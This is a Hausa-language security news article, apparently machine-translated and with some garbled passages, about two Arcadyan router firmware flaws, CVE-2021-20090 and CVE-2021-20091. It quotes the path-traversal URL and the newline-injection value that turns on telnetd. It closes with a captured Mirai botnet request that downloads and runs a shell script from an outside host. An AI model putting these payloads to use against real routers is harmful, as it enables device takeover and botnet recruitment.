An yi rikodin babban hari akan hanyar sadarwa akan masu amfani da gida waɗanda firmware ke amfani da aiwatar da sabar HTTP daga kamfanin Arcadyan. Don samun iko akan na'urori, ana amfani da haɗe-haɗe na lahani guda biyu waɗanda ke ba da izinin aiwatar da lambar sabani tare da haƙƙin tushen. Matsalar tana shafar kewayon masu amfani da hanyoyin ADSL daga Arcadyan, ASUS da Buffalo, da kuma na'urorin da aka kawo a ƙarƙashin samfuran Beeline (an tabbatar da matsalar a cikin Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone da sauran kamfanonin sadarwa. An lura cewa matsalar ta kasance a cikin firmware Arcadyan fiye da shekaru 10 kuma a wannan lokacin ya sami damar yin ƙaura zuwa aƙalla samfuran na'urori 20 daga masana'antun 17 daban-daban.
Rashin lahani na farko, CVE-2021-20090, yana ba da damar samun damar kowane rubutun mu'amalar yanar gizo ba tare da tantancewa ba. Ma'anar raunin shine cewa a cikin mahallin yanar gizo, wasu kundayen adireshi waɗanda aka aika hotuna, fayilolin CSS da rubutun JavaScript ana samun dama ba tare da tantancewa ba. A wannan yanayin, kundayen adireshi waɗanda aka ba da izinin shiga ba tare da tantancewa ba ana bincika ta amfani da abin rufe fuska na farko. Famware yana toshe ƙayyadaddun haruffan "../" a cikin hanyoyin da za a je zuwa directory ɗin iyaye ta hanyar firmware, amma an tsallake amfani da haɗin "..% 2f". Don haka, yana yiwuwa a buɗe shafuka masu kariya lokacin aika buƙatun kamar "http://192.168.1.1/images/..%2findex.htm".
Rashin lahani na biyu, CVE-2021-20091, yana bawa mai amfani da ingantaccen damar yin canje-canje ga saitunan tsarin na'urar ta hanyar aika sigogin da aka tsara musamman zuwa rubutun apply_abstract.cgi, wanda baya bincika kasancewar sabon layin layi a cikin sigogi. . Misali, lokacin yin aikin ping, mai kai hari zai iya tantance ƙimar “192.168.1.2%0AARC_SYS_TelnetdEnable=1” a cikin filin tare da adireshin IP da ake bincika, da rubutun, lokacin ƙirƙirar fayil ɗin saiti /tmp/etc/config/ .glbcfg, zai rubuta layin "AARC_SYS_TelnetdEnable=1" a cikinsa ", wanda ke kunna sabar telnetd, wanda ke ba da damar shiga harsashi mara iyaka tare da haƙƙin tushen. Hakazalika, ta hanyar saita sigar AARC_SYS, zaku iya aiwatar da kowace lamba akan tsarin. Rashin lahani na farko yana ba da damar gudanar da rubutun matsala ba tare da tantancewa ba ta hanyar samun dama ga shi a matsayin "/images/..%2fapply_abstract.cgi".
Don yin amfani da rashin lahani, dole ne maƙiyi ya iya aika buƙatu zuwa tashar sadarwa da ke gudana a kai. Yin la'akari da yanayin yaduwar yaduwar harin, yawancin masu aiki suna barin damar yin amfani da na'urorin su daga cibiyar sadarwar waje don sauƙaƙe ganewar matsalolin da sabis na tallafi. Idan damar yin amfani da keɓancewa ya iyakance ne kawai ga hanyar sadarwa ta ciki, ana iya kai hari daga cibiyar sadarwar waje ta amfani da dabarar “Rebinding DNS”. An riga an riga an yi amfani da rashin ƙarfi don haɗa masu amfani da hanyar sadarwa zuwa Mirai botnet: POST /images/..% 2fapply_abstract.cgi HTTP/1.1 Haɗin: kusa-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5dress 212.192.241.7%0A ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
source: budenet.ru